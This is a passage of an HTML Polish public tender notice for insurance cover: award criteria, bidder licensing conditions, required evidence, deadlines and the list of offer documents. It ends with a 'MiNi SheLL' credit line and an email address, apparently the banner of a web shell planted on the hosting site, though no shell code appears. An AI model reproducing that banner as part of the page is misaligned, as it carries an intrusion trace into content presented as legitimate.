class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zakres ubezpieczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące: <br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów. <br/>Warunek zostanie spełniony jeśli:<br/>a) Wykonawca posiada uprawnienia na prowadzenie działalności ubezpieczeniowej zgodnie z ustawą z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (t.j. Dz.U. 2024 r., poz. 838 z późn. zm.) w zakresie co najmniej tożsamym z przedmiotem zamówienia w poszczególnych CZĘŚCIACH zamówienia i taką działalność prowadzi w pełnych zakresach rodzajów ubezpieczenia ujętych w::<br/>DZIAŁ II, GRUPY: 1; 3; 8; 9; 10; 13; 16<br/>- zgodnie z Załącznikiem do ustawy z dnia 11 września 2015 r., Podział Ryzyka według Działów, Grup i Rodzajów ubezpieczeń: DZIAŁ I Ubezpieczenia na życie;. DZIAŁ II Pozostałe ubezpieczenia osobowe oraz ubezpieczenia majątkowe.<br/><br/><br/>b) Wykonawca posiada uprawnienia na prowadzenie działalności w zakresie ubezpieczeń obowiązkowych zgodnie z ustawą z dnia 22.05.2003 r. o ubezpieczeniach obowiązkowych, Ubezpieczeniowym Funduszu Gwarancyjnym i Polskim Biurze Ubezpieczycieli Komunikacyjnych (t.j. Dz. U. poz. 2500 z późn. zm.), w zakresie co najmniej tożsamym z przedmiotem zamówienia w CZĘŚCI Nr 1 zamówienia i taką działalność prowadzi, tj. <br/>- obowiązkowe ubezpieczenie odpowiedzialności cywilnej zarządcy nieruchomości, <br/>- obowiązkowe ubezpieczenie oc posiadacza pojazdów mechanicznych<br/>Dział II, GRUPY: 10, 13 <br/>- zgodnie z Załącznikiem do ustawy z <br/>dnia 11 września 2015 r., Podział <br/>Ryzyka według Działów, Grup i <br/>Rodzajów ubezpieczeń: DZIAŁ I Ubezpieczenia na życie;. DZIAŁ II Pozostałe ubezpieczenia osobowe oraz ubezpieczenia majątkowe <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) ustawy, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. <br/>Sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) Zezwolenie właściwego organu na prowadzenie działalności ubezpieczeniowej zgodnie z ustawą z dnia 11 września 2015 r. o działalności ubezpieczeniowej i reasekuracyjnej (t.j. Dz.U. 2024 r., poz. 838 z późn. zm.) w zakresie co najmniej tożsamym z przedmiotem zamówienia w poszczególnych CZĘŚCIACH zamówienia i taką działalność prowadzi w pełnych zakresach rodzajów Ubezpieczenia ujętych w: <br/><br/>DZIAŁ II, GRUPY: 1; 3; 8; 9; 10; 13; 16 <br/>- zgodnie z Załącznikiem do ustawy z <br/>dnia 11 września 2015 r., Podział <br/>Ryzyka według Działów, Grup i <br/>Rodzajów ubezpieczeń: DZIAŁ I Ubezpieczenia na życie;. DZIAŁ II Pozostałe ubezpieczenia osobowe oraz ubezpieczenia majątkowe.<br/><br/><br/>b) Zezwolenie właściwego organu na prowadzenie działalności w zakresie ubezpieczeń obowiązkowych zgodnie z ustawą z dnia 22.05.2003 r. o ubezpieczeniach obowiązkowych, Ubezpieczeniowym Funduszu Gwarancyjnym i Polskim Biurze Ubezpieczycieli Komunikacyjnych (t.j. Dz. U. poz. 2500 z późn. zm.), w zakresie co najmniej tożsamym z przedmiotem zamówienia w CZĘŚCI Nr 1 zamówienia i taką działalność <br/>prowadzi, tj.:<br/>- obowiązkowe ubezpieczenie odpowiedzialności cywilnej zarządcy nieruchomości,<br/>- obowiązkowe ubezpieczenie oc posiadacza pojazdów mechanicznych. Dział II, GRUPY: 10, 13 <br/>- zgodnie z Załącznikiem do ustawy z <br/>dnia 11 września 2015 r., Podział <br/>Ryzyka według Działów, Grup i <br/>Rodzajów ubezpieczeń: DZIAŁ I Ubezpieczenia na życie;. DZIAŁ II Pozostałe ubezpieczenia osobowe oraz ubezpieczenia majątkowe</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy Zamawiający opisał w paragrafie 7 i 8 projektowanych postanowień umownych - Załącznik nr 15 oraz 23 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/wtbs</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-15 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający przewiduje możliwość przeprowadzenia przez Wykonawcę wizji lokalnej lub sprawdzenia przez niego dokumentów niezbędnych do realizacji zamówienia, o których mowa w art. 131 ust.2 ustawy Pzp.<br/>2. NOWE PODSTAWY WYKLUCZENIA Z POSTĘPOWANIA LUB KONKURSU ORAZ KARA PIENIĘŻNA JAKO SANKCJE W CELU PRZECIWDZIAŁANIA WSPIERANIU AGRESJI FEDERACJI ROSYJSKIEJ NA UKRAINĘ Zamawiający zawarł w pkt. 7.41 SWZ<br/>3. 17.	ZAWARTOŚĆ OFERTY <br/>Oferta musi zawierać:<br/>17.1.	Formularz ofertowy na część na którą oferta jest składana (w zakresie CZĘŚĆ Nr 1 - Załącznik Nr 14 do SWZ, zaś w zakresie CZĘŚĆ Nr 2 – Załącznik nr 22 do SWZ) wraz z Załącznikami wymienionymi w obu Formularzach ofertowych, w tym:<br/>17.2.	Formularz cenowy ubezpieczenia mienia ( Załącznik Nr 9 do SWZ) – CZĘŚĆ Nr 1.<br/>17.3.	Formularz cenowy ubezpieczenia sprzętu elektronicznego ( Załącznik Nr 10 do SWZ) - CZĘŚĆ Nr 1 <br/>17.4.	Formularz cenowy ubezpieczenia odpowiedzialności cywilnej z tytułu prowadzenia działalności i / lub posiadania mienia (Załącznik Nr 11 do SWZ) – CZĘŚĆ Nr 1.<br/>17.5.	Formularz cenowy obowiązkowego ubezpieczenia odpowiedzialności cywilnej zarządcy nieruchomości (Załącznik Nr 12 do SWZ) – CZĘŚĆ Nr 1.<br/>17.6.	Formularz cenowy ubezpieczenia komunikacyjnego (Załącznik Nr 13 do SWZ) – CZĘŚĆ Nr 1.<br/>17.7.	Formularz cenowy ubezpieczenia władz spółek kapitałowych (D&amp;O) (Załącznik Nr 23 do SWZ) – CZĘŚĆ Nr 2.<br/>17.8.	Zestawienie: sumy ubezpieczenia, sumy gwarancyjne - ubezpieczanych przedmiotów / ryzyk (Załącznik Nr 3 do SWZ: Tabela Nr 1, Tabela Nr 2, Tabela Nr 3, Tabela Nr 4, Tabela Nr 5, tabela nr 5a, Tabela Nr 5b, Tabela Nr 6, Tabela Nr 7) - CZĘŚĆ Nr 1. <br/>17.9.	Zestawienie: sumy ubezpieczenia, limity – ubezpieczenia D&amp;O (Załącznik Nr 3a do SWZ: Tabela Nr 1, Tabela Nr 2,) - CZĘŚĆ Nr 2. <br/>17.10.	Zestawienie: sumy ubezpieczenia , sumy gwarancyjne, limity, CZĘŚĆ Nr 1; CZĘŚĆ Nr 2<br/>17.11.	Zaakceptowany wzór Potwierdzenia Wykonawcy o dokonaniu Cesji ( Załącznik nr 16 do SWZ) – CZĘŚĆ Nr 1.<br/>17.12.	Zaakceptowane postanowienia umowy ( Załącznik nr 15 do SWZ) – CZĘŚĆ Nr 1<br/>17.13.	Zaakceptowane postanowienia umowy ( Załącznik nr 23 do SWZ) – CZĘŚĆ Nr 2<br/>17.14.	Oświadczenie Wykonawcy w trybie art. 125 ust. 1 ustawy Pzp według wzoru stanowiącego Załącznik Nr 6 do SWZ.<br/>17.15. Pełnomocnictwo do reprezentowania, jeżeli ofertę składa pełnomocnik.<br/>17.16.	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>17.17.	Zobowiązanie podmiotu udostępniającego zasoby – Załącznik Nr 8 do SWZ – jeżeli dotyczy<br/>17.18.	Oświadczenie Podwykonawcy, na którego zasoby powołuje się Wykonawca – Załącznik Nr 7 do SWZ – jeżeli dotyczy.<br/>17.19.	Oświadczenie, o którym mowa w pkt. 7.16. SWZ – jeżeli dotyczy.<br/>17.20. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Zamawiający żąda od Wykonawcy aktualnego odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.

Creat By MiNi SheLL
Email: jattceo@gmail.com